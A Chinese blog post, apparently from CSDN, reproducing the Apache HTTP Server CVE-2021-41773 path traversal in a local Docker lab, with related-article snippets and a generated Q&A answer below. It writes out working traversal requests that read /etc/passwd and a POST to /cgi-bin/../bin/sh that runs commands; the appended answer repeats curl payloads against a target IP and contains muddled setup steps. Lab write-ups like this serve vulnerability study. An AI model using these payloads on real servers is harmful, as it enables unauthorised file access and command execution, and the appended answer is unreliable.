CVE-2021-41773目录遍历(文件穿越)漏洞复现

最新推荐文章于 2024-05-22 08:00:00 发布
最新推荐文章于 2024-05-22 08:00:00 发布
阅读量1.7k 收藏 4
点赞数 2
文章标签: docker linux 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59826623/article/details/120712933
版权

CVE-202141773目录遍历(文件穿越)漏洞

Kali Linux的docker环境下

首先将环境下载到本地

进入CVE-202141773漏洞环境文件夹,执行docker-compose up -d启动漏洞环境。

等待文件下载……

安装完成后重启服务

访问本地的8080端口

打开Burpsuite,构造get参数

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

转换为post参数

修改命令为

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo Content-Type: text/plain; echo; id

在请求的正文下执行命令,此时漏洞产生,查看下id

whoami

FuTur3
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CGI漏洞速查一
|独自望海。。。
09-28 1337
1.wguset.exe   描述: 如果您使用NT做为您的WebServer的操作系统,而且 “wguest.exe”存在于您的Web可执行目录中的话,入侵者将能利用 它阅读到您的硬盘上所有USR_用户能阅读的文件。 建议: 将wguset.exe从你的We
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
weixin_45260839的博客
06-03 5586
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
目录遍历漏洞
最新发布
qq_68163788的博客
05-22 1202
目录遍历漏洞(Directory Traversal Vulnerability),也称为路径遍历漏洞,是指攻击者可以在没有得到授权的情况下,访问服务器上的敏感文件目录,甚至可以直接获取服务器的控制权。 目录遍历漏洞的原理是利用Web应用程序中对用户输入数据的不完全过滤和验证,攻击者可以构造特定的URL请求,通过在URL中添加../等符号,来访问系统中的其他目录文件。例如,攻击者可以通过以下URL访问系统中的敏感文件:http://www.example.com/index.php?page=../
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 6064
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
GitLab 目录遍历漏洞复现(CVE-2023-2825)
qq_34914659的博客
05-30 2044
漏洞存在于GitLab CE/EE版本16.0.0中,当嵌套在至少五个组中的公共项目中存在附件时,可在未经身份验证的情况下通过uploads功能遍历读取任意文件,导致敏感信息泄露。GitLab是一个用于仓库管理系统的开源项目,其使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。社区版(CE)和企业版(EE)的 16.0.0 版本,其它更早的版本几乎都不受影响。1.需要一个嵌套五层以上可公开访问到的group 组并添加项目。步骤四:项目添加完成,添加评论。步骤五:测试访问上传的文件
目录遍历漏洞原理、解决方案
qq_44005305的博客
03-10 4616
目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。
CVE-2021-41773 漏洞复现
爱吃仡坨的Blog
10-13 619
Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在../的路径穿越符当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->.,转换完成后会判断是否存在../。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
Spring Boot 目录遍历CVE-2021_21234)
小小猪的博客
12-31 4318
Spring Boot 目录遍历CVE-2021_21234) 漏洞简介: spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端
Java防御目录穿越漏洞方法_Elasticsearch漏洞汇总
weixin_33467739的博客
03-01 1490
简介Elasticsearch是一个开源的分布式、RESTful 风格的搜索和数据分析引擎,它的底层是开源库Apache Lucene。Lucene 可以说是当下最先进、高性能、全功能的搜索引擎库——无论是开源还是私有,但它也仅仅只是一个库。为了充分发挥其功能,你需要使用 Java 并将 Lucene 直接集成到应用程序中。 更糟糕的是,您可能需要获得信息检索学位才能了解其工作原理,因为Lucen...
漏洞目录遍历漏洞
angry_program的博客
01-10 2391
目录遍历漏洞 目录遍历, 也叫路径遍历,由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件 (可以是web根目录以外的文件),甚至可以执行系统命令。 原理 程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。...
Nginx目录遍历漏洞复现
huayimy的博客
12-30 2079
Nginx目录遍历漏洞复现,this statement may fail through,error: 'struct crypt_data' has no member named 'current_salt'
安全漏洞CVE-2021-41773CVE-2021-42013漏洞分析
HBohan的博客
10-16 2066
CVE-2021-41773 漏洞成因 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: while (path[l] != '\0') { if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(p
Web 目录枚举与遍历漏洞解决
热门推荐
11-19 1万+
目录枚举漏洞”解决方法一、名词解释 网站目录枚举漏洞:指黑客利用非法攻击手段扫描符合“8.3”命名原则的目录文件。二、验证工具:scanner-compiled三、验证方法 图 1 四、解决方法1、打开注册表,进入 HKLM\SYSTEM\CurrentControlSet\Control\FileSystem,新建 DWORD值 NtfsDisable8dot3NameCreatio
cve-2021-41773漏洞复现
06-28
### 回答1: cve-2021-41773漏洞是Apache HTTP Server中的一个安全漏洞,攻击者可以利用该漏洞在未经授权的情况下访问服务器上的文件。 要复现漏洞,可以按照以下步骤进行: 1. 安装Apache HTTP Server,并确保其版本为2.4.49或更早版本。 2. 创建一个名为“test”的目录,并在其中创建一个名为“test.txt”的文件。 3. 启动Apache HTTP Server,并访问以下URL:http://localhost/test/.%2e/%2e%2e/%2e%2e/%2e%2e/test.txt 4. 如果服务器返回“HTTP/1.1 200 OK”响应,则表示漏洞存在,攻击者可以访问服务器上的任何文件。 需要注意的是,该漏洞只影响Apache HTTP Server 2.4.49及更早版本,如果您使用的是更新版本的Apache HTTP Server,则不受此漏洞的影响。同时,为了保护服务器的安全,建议及时更新Apache HTTP Server的版本。 ### 回答2: cve-2021-41773漏洞是一种存在于Apache HTTP Server 2.4.49以前版本的目录遍历漏洞,攻击者可以通过构造恶意的GET请求来访问并读取目标服务器上没有授权读取权限的文件,例如 /usr/local/apache/logs/error.log。 这个漏洞复现非常简单,只需要使用curl或者其他工具向目标服务器发起恶意的GET请求,即可获取目标服务器上的敏感信息。 首先需要确定目标服务器上是否安装了Apache HTTP Server,并且确认目标服务器的版本是否在2.4.49以前。可以使用nmap等端口扫描工具扫描目标服务器上是否开放了HTTP服务,并尝试访问目标服务器上的默认页面,确认是否安装了Apache HTTP Server。 如果确定目标服务器上存在Apache HTTP Server,并且版本较低,则可以使用curl等工具向目标服务器发起以下恶意请求: curl -v http://<target_ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 其中,<target_ip>需要替换为目标服务器的IP地址,上述请求会尝试访问目标服务器上的/etc/passwd文件。如果能够获取到文件内容,则说明漏洞复现成功。 防范这个漏洞,首先需要及时升级Apache HTTP Server的版本,避免漏洞被攻击者利用。其次,可以使用Web应用程序防火墙(WAF)等安全工具来阻止滥用漏洞的请求,减少漏洞被攻击的风险。最后,建议对服务器配置进行加固,避免敏感文件被访问。 ### 回答3: cve-2021-41773漏洞是一个Apache HTTP Server的安全漏洞,可通过发送特制的HTTP请求来导致服务器上已经存在的目录结构泄露。该漏洞可能会公开网站上存在的私人和敏感信息,并为攻击者进一步攻击网站提供有关目标的有用信息。此漏洞的影响范围很广,可能影响许多版本的Apache HTTP Server。 要复现这个漏洞,我们需要在本地搭建一台Apache HTTP Server并设置虚拟主机。 在此之前,我们需要确保已经安装了Apache HTTP Server,如果没有安装Apache HTTP Server,可以通过以下命令在Ubuntu上安装: sudo apt-get update sudo apt-get install apache2 安装完成后,我们需要设置虚拟主机。在此例中,我们将使用名为example.com的虚拟主机。我们可以通过以下步骤进行设置: 1. 创建一个名为example.com的目录: sudo mkdir /var/www/example.com 2. 将权限设置为Apache用户: sudo chown -R www-data:www-data /var/www/example.com 3. 在我们刚创建的目录中创建一个名为index.html的文件: sudo nano /var/www/example.com/index.html 输入一些HTML代码,例如“ Hi there!” 保存并关闭文件。 4.创建一个apache虚拟主机配置文件: sudo nano /etc/apache2/sites-available/example.com.conf 在配置文件中添加以下行,以配置虚拟主机: <VirtualHost *:80> ServerAdmin webmaster@example.com DocumentRoot /var/www/example.com ServerName example.com ServerAlias www.example.com <Directory /var/www/example.com> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> 保存并关闭文件。 5. 禁用默认虚拟主机: sudo a2dissite 000-default.conf 6. 启用新虚拟主机: sudo a2ensite example.com.conf 7. 配置Apache HTTP Server: sudo service apache2 reload 现在我们已经设置了虚拟主机,我们可以开始测试漏洞。我们可以使用curl发送一个特制的HTTP请求来尝试获取服务器上的文件目录结构。如下所示: curl -v http://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 上面的请求意味着我们正在请求服务器上的“/etc/passwd”文件,这是一个包含用户的帐号信息的文件。执行上面命令后,我们将看到类似以下内容的响应: ... < HTTP/1.1 200 OK < Accept-Ranges: bytes < Content-Length: 266 < Connection: close < Content-Type: text/plain ... root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... ... 在上面的响应中我们可以看到给出的是服务器上的用户的帐户信息,这表明我们已经成功地利用了漏洞获取了服务器上的敏感信息。 攻击者可以进一步利用此信息对系统进行攻击。此外,在通过Apache HTTP Server公开网站的时候,最好配置适当的安全策略以确保保证系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值